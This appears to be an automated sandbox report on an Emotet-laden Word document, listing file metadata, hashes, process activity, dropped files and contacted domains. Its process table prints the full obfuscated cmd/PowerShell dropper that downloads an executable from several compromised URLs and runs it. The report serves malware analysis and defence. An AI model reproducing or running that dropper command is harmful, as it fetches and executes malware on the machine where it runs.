File name: | EMOTET.doc |
Full analysis: | https://app.any.run/tasks/12299ab1-a5d0-4f57-a80d-45ec4e6f94da |
Verdict: | Malicious activity |
Analysis date: | January 17, 2020, 14:50:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: ViHzifOp, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 14 06:34:00 2017, Last Saved Time/Date: Thu Dec 14 06:34:00 2017, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0 |
MD5: | E8D9EB977EC98E7616AC0A358D1A44B3 |
SHA1: | F9B475CFF7F059645C511FFB0D5335DB81FE590A |
SHA256: | C52F09E474C5D9B316E0B8E5E839282E52268A79B03BEF1CEFAAEE4C2CEC793E |
SSDEEP: | 3072:a6WCv4rz7hnxKaCvT8SVlcP1nyfGfHm7cXSwQ3T6iveFgBuJWz:4z9EjlVmP1c0JQ3NsJ4 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | ViHzifOp |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2017:12:14 06:34:00 |
ModifyDate: | 2017:12:14 06:34:00 |
Pages: | 1 |
Words: | 1 |
Characters: | 11 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 11 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1096 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EMOTET.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3796 | cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %TVTEimDaQlaTNit%=hqpCiruvT&&set %TQzjKjbpTs%=o^we^r^s&&set %LlcncNiALWEzjzz%=NLjbwkQEoIotK&&set %ntSiPjinh%=p&&set %wbaYkWAbmnYwSCH%=pNzrqJUjLTWbVXw&&set %TTjVYaz%=^he^l^l&&set %UYkqNvdbzcwSaYK%=fdiIPbKwDBiuPEN&&!%ntSiPjinh%!!%TQzjKjbpTs%!!%TTjVYaz%! "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . ( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X') | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
896 | powershell "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . ( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1096 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB214.tmp.cvr | — | |
MD5:— | SHA256:— | |||
896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TCSKOEAMQOJHM56FP1F3.temp | — | |
MD5:— | SHA256:— | |||
896 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A2ECA083537A02B6158458FF1752C63F | binary | |
MD5:B92B932DB9511C477EA3B7FD00731C00 | SHA256:6CDA4C84B5EB93A9C4A603DDEF0415E5B76CAB78F6756D286F796D98370B10FF | |||
896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bf72.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1096 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:71834CB5A40FD067717E5E242FCFDDE2 | SHA256:053F9EECE736E49AA9E3C99DB635C70D83D2B9311D2D3CA8D612695DCF73376C | |||
1096 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$EMOTET.doc | pgc | |
MD5:77062AD3919613D252BBDA640BCF8E67 | SHA256:527B246D794ACF52454FC292293578EA8675DE33257846A9D35EDDFA9294DEF7 | |||
896 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A2ECA083537A02B6158458FF1752C63F | der | |
MD5:B15409274F54AD8F023D3B85A5ECEC5D | SHA256:25847D668EB4F04FDD40B12B6B0740C567DA7D024308EB6C2C96FE41D9DE218D |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
896 | powershell.exe | 34.208.67.28:443 | www.mivaso.cl | Amazon.com, Inc. | US | suspicious |
896 | powershell.exe | 2.19.43.67:80 | cert.int-x3.letsencrypt.org | Akamai International B.V. | — | unknown |
896 | powershell.exe | 34.208.67.28:80 | www.mivaso.cl | Amazon.com, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.zavierdesign.com |
| malicious |
www.mivaso.cl |
| whitelisted |
cert.int-x3.letsencrypt.org |
| whitelisted |
mivaso.cl |
| malicious |